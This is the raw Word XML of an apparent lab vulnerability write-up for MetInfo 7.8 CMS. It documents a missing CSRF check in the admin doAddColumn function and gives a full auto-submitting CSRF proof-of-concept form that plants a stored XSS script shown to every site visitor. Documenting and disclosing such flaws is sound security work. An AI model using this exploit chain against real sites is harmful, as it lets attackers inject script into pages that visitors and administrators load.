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F8C7" w14:textId="77777777" w:rsidR="002A13E5" w:rsidRDefault="002A13E5" w:rsidP="002A13E5">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="006368E9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.metinfo.cn/download/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43938187" w14:textId="6FCD5586" w:rsidR="002A13E5" w:rsidRDefault="002A13E5" w:rsidP="002B40EA">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="007B20EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3356E7DF" wp14:editId="0D03A835">
            <wp:extent cx="5274310" cy="2173605"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="188338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4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F43" w14:textId="77777777" w:rsidR="002A13E5" w:rsidRDefault="002A13E5" w:rsidP="002B40EA">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17859256" w14:textId="153F9713" w:rsidR="00C53095" w:rsidRDefault="00F11484" w:rsidP="002B40EA">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="00F11484">
        <w:t>MetInfo7.8</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F11484">
        <w:t>app/system/column/admin/index.class.php</w:t>
      </w:r>
      <w:r w:rsidR="002B40EA" w:rsidRPr="002B40EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B40EA">
        <w:t>Middle doAddColumn()Without any safety measures_ AddColumn() didn't do either, it just added data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E054C3A" w14:textId="5D946328" w:rsidR="003E3A4D" w:rsidRDefault="003E3A4D">
      <w:r w:rsidRPr="003E3A4D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20ACE4CD" wp14:editId="3FE96FCA">
            <wp:extent cx="5274310" cy="2941955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="197498908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9084" name="图片 1" descr="图形用户界面, 文本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BF45" w14:textId="25672300" w:rsidR="003E3A4D" w:rsidRPr="00F11484" w:rsidRDefault="003E3A4D">
      <w:r w:rsidRPr="003E3A4D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00B6884D" wp14:editId="6624B31D">
            <wp:extent cx="5274310" cy="2914650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1648534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34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7CCC" w14:textId="6F90D327" w:rsidR="00821009" w:rsidRDefault="00C53095">
      <w:r w:rsidRPr="00C53095">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BDE7838" wp14:editId="02071166">
            <wp:extent cx="5274310" cy="2641600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="95207916" name="图片 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7916" name="图片 1" descr="电脑软件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F1DF" w14:textId="0F4EE00B" w:rsidR="002B40EA" w:rsidRDefault="002B40EA" w:rsidP="002B40EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Tom content administrator has the lowest permissions compared to others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC75D80" w14:textId="5A79D78B" w:rsidR="00C53095" w:rsidRDefault="002B40EA" w:rsidP="002B40EA">
      <w:r>
        <w:t>After logging in, click on the add section, select the header in the navigation section for easy viewing, or click on the hide button to make it difficult to find</w:t>
      </w:r>
      <w:r w:rsidR="00C5425D" w:rsidRPr="00C5425D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30F46837" wp14:editId="15248230">
            <wp:extent cx="5274310" cy="2922905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1475222679" name="图片 1" descr="电脑软件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679" name="图片 1" descr="电脑软件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890E" w14:textId="58D32786" w:rsidR="00C53095" w:rsidRDefault="00C5425D">
      <w:r w:rsidRPr="00C5425D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37A02F19" wp14:editId="545FF18D">
            <wp:extent cx="5274310" cy="2143760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="19486279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2799" name="图片 1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4140" w14:textId="77777777" w:rsidR="00F424D2" w:rsidRDefault="00F424D2"/>
    <w:p w14:paraId="23CB2275" w14:textId="10C730CB" w:rsidR="00F424D2" w:rsidRDefault="002B40EA">
      <w:r w:rsidRPr="002B40EA">
        <w:t>Capture packets and place them in BP CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00206F01" w:rsidRPr="00206F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FB4E0EA" wp14:editId="59F78123">
            <wp:extent cx="5274310" cy="2513330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1566430463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30463" name="图片 1" descr="图形用户界面, 文本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E256" w14:textId="5DC7BBF4" w:rsidR="0061763C" w:rsidRDefault="00614DF2">
      <w:r w:rsidRPr="00614DF2">
        <w:t>All the drawing areas need to be changed, otherwise they will be repeated (mainly the one on line 12)</w:t>
      </w:r>
      <w:r w:rsidR="000E4D60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4C874E" wp14:editId="217520E4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2499200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>843200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1557720" cy="63360"/>
                <wp:effectExtent l="38100" t="38100" r="0" b="51435"/>
                <wp:wrapNone/>
                <wp:docPr id="410382546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577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E1D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left:0;text-align:left;margin-left:196.1pt;margin-top:65.7pt;width:124.05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">
                <v:imagedata r:id="rId14" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000E4D6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6D5DEA" wp14:editId="5D0DEB3E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2712680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1050920</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="264240" cy="30960"/>
                <wp:effectExtent l="38100" t="38100" r="40640" b="45720"/>
                <wp:wrapNone/>
                <wp:docPr id="719111329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4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274FD" id="墨迹 3" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:212.9pt;margin-top:82.05pt;width:22.2pt;height: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">
                <v:imagedata r:id="rId16" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000E4D60" w:rsidRPr="000E4D60">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="715899E7" wp14:editId="43D3422F">
            <wp:extent cx="5274310" cy="1798320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2044579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791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85D4" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6480EEA7" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">  &lt;!-- CSRF PoC - generated by Burp Suite  Professional --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4150784D" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4723F093" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">    &lt;form action="http://192.168.1.7/metInfo7.8/admin/index.php?n=column&amp;c=index&amp;a=doAddColumn" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D0FFA2" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="no&amp;#95;order&amp;#45;new&amp;#45;0" value="0" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EBC797" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="id" value="0" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3454A840" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="bigclass&amp;#45;new&amp;#45;0" value="0" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC7622A" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="classtype&amp;#45;new&amp;#45;0" value="1" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320DA09A" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="name&amp;#45;new&amp;#45;0" value="&lt;script&gt;alert('fuck-xss')&lt;/script&gt;"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD70864" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="nav&amp;#45;new&amp;#45;0" value="1" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769B302" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="module&amp;#45;new&amp;#45;0" value="1" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D04FC8F" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="foldername&amp;#45;new&amp;#45;0" value="xxx" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4359F9ED" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="submit&amp;#95;type" value="save" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD5DC3A" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="allid" value="0" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406E82D3" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="submit" value="Submit request" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9DA5E7" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF2732C" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C393A2C" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      history.pushState('', '', '/');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7985FE" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">      document.forms[0].submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23166393" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF6D373" w14:textId="77777777" w:rsidR="00FD6166" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3C3AE8" w14:textId="141A9C7A" w:rsidR="005954DA" w:rsidRDefault="00FD6166" w:rsidP="00FD6166">
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A20245D" w14:textId="1C2997F2" w:rsidR="002B2E03" w:rsidRDefault="00614DF2">
      <w:r w:rsidRPr="00614DF2">
        <w:t>Then switch to a different browser to access it (you can do it without changing) http://192.168.1.7/csrf.html</w:t>
      </w:r>
      <w:r w:rsidR="002B2E03" w:rsidRPr="002B2E03">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C3B93EC" wp14:editId="39827AE6">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="170302374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23740" name="图片 1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649" w14:textId="7755E541" w:rsidR="002A5BBC" w:rsidRDefault="002A5BBC">
      <w:r w:rsidRPr="002A5BBC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3548E8D3" wp14:editId="449E6103">
            <wp:extent cx="5274310" cy="1835150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="104734057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4057" name="图片 1" descr="图形用户界面, 文本, 应用程序, Word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C6E" w14:textId="6975F29A" w:rsidR="000E4D60" w:rsidRDefault="00614DF2">
      <w:r w:rsidRPr="00614DF2">
        <w:t>Added successfully</w:t>
      </w:r>
      <w:r w:rsidR="00B97E48" w:rsidRPr="00B97E48">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E45B4B" wp14:editId="27550CFB">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="112956034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6034" name="图片 1" descr="电脑萤幕的截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B9AF" w14:textId="6274556E" w:rsidR="00B97E48" w:rsidRDefault="006F2991">
      <w:r w:rsidRPr="006F2991">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23FE4A22" wp14:editId="71277421">
            <wp:extent cx="5274310" cy="2755265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="197491095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10956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57E" w14:textId="66A96A5B" w:rsidR="00B97E48" w:rsidRDefault="00B97E48"/>
    <w:p w14:paraId="188FE332" w14:textId="77B54D5A" w:rsidR="00B97E48" w:rsidRDefault="00B87F8C">
      <w:r w:rsidRPr="00B87F8C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="016568B7" wp14:editId="4CCA94FE">
            <wp:extent cx="5274310" cy="1990090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2113365382" name="图片 1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65382" name="图片 1" descr="图形用户界面, 应用程序, 网站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17BD" w14:textId="3EB4DA6F" w:rsidR="00614DF2" w:rsidRDefault="00614DF2" w:rsidP="00614DF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The js will be loaded in all four places where the administrator draws lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F90F8A4" w14:textId="77777777" w:rsidR="002A41C1" w:rsidRDefault="00614DF2" w:rsidP="00614DF2">
      <w:r>
        <w:t>Ordinary users will load this JavaScript wherever they go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2319871E" w14:textId="4411F804" w:rsidR="001A74A6" w:rsidRDefault="002A41C1" w:rsidP="00614DF2">
      <w:r w:rsidRPr="002A41C1">
        <w:t>Other visitors will trigger xss</w:t>
      </w:r>
      <w:r w:rsidR="001A74A6" w:rsidRPr="001A74A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="720212F4" wp14:editId="2248DE78">
            <wp:extent cx="5274310" cy="3166110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="55490694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06943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2B7" w14:textId="77777777" w:rsidR="008C6CFF" w:rsidRDefault="008C6CFF"/>
    <w:p w14:paraId="2A89A7B1" w14:textId="5ED13E13" w:rsidR="008C6CFF" w:rsidRPr="002B2E03" w:rsidRDefault="00105B76">
      <w:r w:rsidRPr="00105B76">
        <w:t>There are no length restrictions here, and there is no filtering in xss that can be executed</w:t>
      </w:r>
      <w:r w:rsidR="00B522EC" w:rsidRPr="00B522EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D5A053" wp14:editId="620083BA">
            <wp:extent cx="4064000" cy="2162639"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="560401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013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1667" cy="21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CFF" w:rsidRPr="002B2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7A"/>
    <w:rsid w:val="000E4D60"/>
    <w:rsid w:val="00105B76"/>
    <w:rsid w:val="001A74A6"/>
    <w:rsid w:val="00206F01"/>
    <w:rsid w:val="002A13E5"/>
    <w:rsid w:val="002A41C1"/>
    <w:rsid w:val="002A5BBC"/>
    <w:rsid w:val="002B2E03"/>
    <w:rsid w:val="002B40EA"/>
    <w:rsid w:val="00302129"/>
    <w:rsid w:val="0032102F"/>
    <w:rsid w:val="003E3A4D"/>
    <w:rsid w:val="004C17FE"/>
    <w:rsid w:val="005954DA"/>
    <w:rsid w:val="00614DF2"/>
    <w:rsid w:val="0061763C"/>
    <w:rsid w:val="00621F9C"/>
    <w:rsid w:val="00656342"/>
    <w:rsid w:val="00680387"/>
    <w:rsid w:val="006F2991"/>
    <w:rsid w:val="0074757A"/>
    <w:rsid w:val="00821009"/>
    <w:rsid w:val="00841C50"/>
    <w:rsid w:val="008C6CFF"/>
    <w:rsid w:val="009A24D6"/>
    <w:rsid w:val="00B068F3"/>
    <w:rsid w:val="00B522EC"/>
    <w:rsid w:val="00B57DD4"/>
    <w:rsid w:val="00B87F8C"/>
    <w:rsid w:val="00B97E48"/>
    <w:rsid w:val="00BA30E0"/>
    <w:rsid w:val="00C53095"/>
    <w:rsid w:val="00C5425D"/>
    <w:rsid w:val="00ED4CAA"/>
    <w:rsid w:val="00F11484"/>
    <w:rsid w:val="00F424D2"/>
    <w:rsid w:val="00FB1D7D"/>
    <w:rsid w:val="00FD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818C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{827FF4B7-2370-4F61-B2A0-D9C7F314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B2E0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11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F11484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hyperlink" Target="https://www.metinfo.cn/download/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink2.xml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2T13:33:06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1'0,"-1"2"0,1 1 0,46 14 0,-21-5 0,-21-5 0,-1 2 0,49 23 0,-46-17 0,49 14 0,18-10 0,-71-14 0,0-1 0,0-1 0,0-2 0,0-1 0,50-4 0,-7 1 0,11 2 0,14 1 0,168-19 0,-28-14 0,87-15 0,-198 24 0,0 5 0,196-2 0,1048 22 0,-1308 1 0,89 16 0,-43-4 0,-20 1 60,-58-10-535,0-1 0,40 3 0,-55-8-63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2T13:33:03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6 24575,'47'-17'0,"401"-49"0,-287 64 11,-95 3-1387,-54-1-545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AF46-6C2B-4DCF-8825-56C76B5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霸天 熊</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>霸天 熊</cp:lastModifiedBy>
  <cp:revision>29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-22T13:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-28T13:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>